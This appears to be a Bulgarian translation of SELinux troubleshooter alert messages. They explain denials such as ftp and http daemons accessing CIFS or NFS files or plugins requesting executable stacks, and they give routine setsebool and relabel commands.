    файлове без PAM. Възможно е, този опит за достъп да сигнализира за опит за
    непозволено влизане в системата.

    Препоръчва се CVS да бъде настроен да ползва PAM, удостоверява с отделен файл
    с потребители, или да ползва друг протокол (напр., ssh) вместо да се разрешава този достъп.
    Вижте документацията на CVS за повече детайли защо този достъп е несигурен
    (<a href="http://ximbiot.com/cvs/manual/cvs-1.11.22/cvs_2.html">http://ximbiot.com/cvs/manual/cvs-1.11.22/cvs_2.html</a>).
    
    SELinux попречи на ftp демона да $ACCESS файлове записани на CIFS файлова система.
    CIFS (Comment Internet File System) е мрежова файлова система като
    SMB (<a href="http://www.microsoft.com/mind/1196/cifs.asp">http://www.microsoft.com/mind/1196/cifs.asp</a>)
    Ftp демона се опита да чете един или повече файлове или директории от
    монтирана файлова система от този тип.  Тъй като CIFS файловите системи
    не поддържат фино-настроени SELinux етикети, всички файлове и директории
    върху файловата система имат еднакъв контекст на сигурност.
    
    Ако не сте настроили ftp демона да чете файлове от CIFS файлова система
    този опит за достъп може да е сигнал за опит за пробив.
    
    SELinux попречи на ftp демона да $ACCESS файлове записани в CIFS файлова система.
    
    SELinux спря ftp демона да $ACCESS файлове записани NFS файлова система.
    NFS (Мрежова Файлова Система) е мрежова файлова система 
    ползвана обикновено в Unix / Linux системи.
    
    Ftp се опита да чете един или няколко файла или директории от
    монтирана файлова система от този тип.  Тъй като NFS файловите
    системи не поддържат фино-настроени SELinux етикети, всички 
    файлове и директории върху файловата система имат еднакъв
    контекст на сигурност.
    
    Ако не сте настроили ftp демона да чете файлове от NFS файлова система
    този опит за достъп може да е сигнал за опит за пробив.
    
    SELinux попречи на ftp демона да $ACCESS файлове записани на NFS файлова система.
    
    SELinux попречи на gss демона да чете от временни файлове на непривилегирован потребител.
    
    SELinux спря http демона да $ACCESS файлове записани CIFS файлова система.
    CIFS (Windows Мрежова Файлова Система) е мрежова файлова система
    ползвана обикновено в Windows / Linux системи.
    
    Демона http се опита да чете един или няколко файла или директории от
    монтирана файлова система от този тип.  Тъй като CIFS файловите
    системи не поддържат фино-настроени SELinux етикети, всички 
    файлове и директории върху файловата система имат еднакъв
    контекст на сигурност.
    
    Ако не сте настроили http демона да чете файлове от NFS файлова система
    това може да е сигнал за опит за пробив.
    
    SELinux попречи на http демона да $ACCESS файлове записани в CIFS файлова система.
    
    SELinux спря http демона да $ACCESS файлове записани NFS файлова система.
    NFS (Мрежова Файлова Система) е мрежова файлова система 
    ползвана обикновено в Unix / Linux системи.
    
    Демона http се опита да чете един или няколко файла или директории от
    монтирана файлова система от този тип.  Тъй като NFS файловите
    системи не поддържат фино-настроени SELinux етикети, всички 
    файлове и директории върху файловата система имат еднакъв
    контекст на сигурност.
    
    Ако не сте настроили http демона да чете файлове от NFS файлова 
    система това може да е сигнал за опит за пробив.
    
    SELinux попречи на http демона да $ACCESS файлове записани на NFS файлова система.
    
    SELinux забранява на java разширение ($SOURCE_TYPE) да направи стека
    изпълним.  Никой софтуер не би трябвало да се нуждае от изпълним стек
    (вижте <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux тестове на защитата на паметта</a>
    за повече информация). Въпреки това, някои версии на Java разширението се знае
    че се нуждаят от този достъп, за да работят правилно. Следва да проверите
    за нова версия на софтуера преди да разрешите този достъп.
    
    SELinux попречи на разширение на mplayer ($SOURCE_TYPE) да направи стека
    изпълним.  Никой софтуер не би трябвало да се нуждае от изпълним стек
    (вижте <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux тестове на защитата на паметта</a>
    за повече информация). Въпреки това, някои версии на разширенията на mplayer се знае
    че се нуждаят от този достъп, за да работят правилно. Следва да проверите
    за нова версия на софтуера преди да разрешите този достъп.
    
    Можете да стартирате следната команда като root за да
    преетикирате системата си: "touch /.autorelabel; reboot"
    
    Можете да генерирате локален модул за политика, който да
    разрешава този достъп - вижте <a href="http://fedora.redhat.com/docs/selinux-faq-fc5/#id2961385">ЧЗВ</a>
    Можете и да изключите SELinux защитата изцяло. Изключването
    на SELinux защитата не се препоръчва.
    Моля, попълнете <a href="http://bugzilla.redhat.com/bugzilla/enter_bug.cgi">рапорт за грешка</a>
    в този пакет.
        Ако искате http демона да слуша на порта за ftp, трябва да
    включите булевата променлива $BOOLEAN: 
    "setsebool -P $BOOLEAN=1"
     Включването на булевите променливи "$BOOLEAN" и
    "$WRITE_BOOLEAN" ще позволи този достъп:
    "setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1".
    предупреждение: включването на "$WRITE_BOOLEAN" ще
    позволи на ftp демона да пише върху цялото публично съдържание (файлове и
    директории с тип public_content_t) освен писането на
    файлове и директории на CIFS файлови системи.   Включването на булевите променливи "allow_ftpd_use_nfs" и
    "$WRITE_BOOLEAN" ще посволи този достъп:
    "setsebool -P allow_ftpd_use_nfs=1 $WRITE_BOOLEAN=1".
    предупреждение: включването на булевата променлива "$WRITE_BOOLEAN" ще
    позволи на ftp демона да пише в цялото публично съдържание (файлове и
    директории с тип public_content_t) освен писането във
    файлове и директории върху NFS файлови системи.  УдостоверяванеCRONCVSСистема за Имена на ДомейниFTPЕтикет на файлФайлова системаJavaЯдроНосителПаметМрежови портовеМрежови операцииRSYNCSAMBASELinux попречи на gss демона да
    чете непривилегировани потребителски временни файлове (т.е., файлове в /tmp). Разрешаването на този
    достъп крие малък риск, но ако не сте настроили gss демона да
    чете тези файлове тази заявка за четене може да сигнализира
    опит за пробив.Уеб сървърZebra

Anon7 - 2021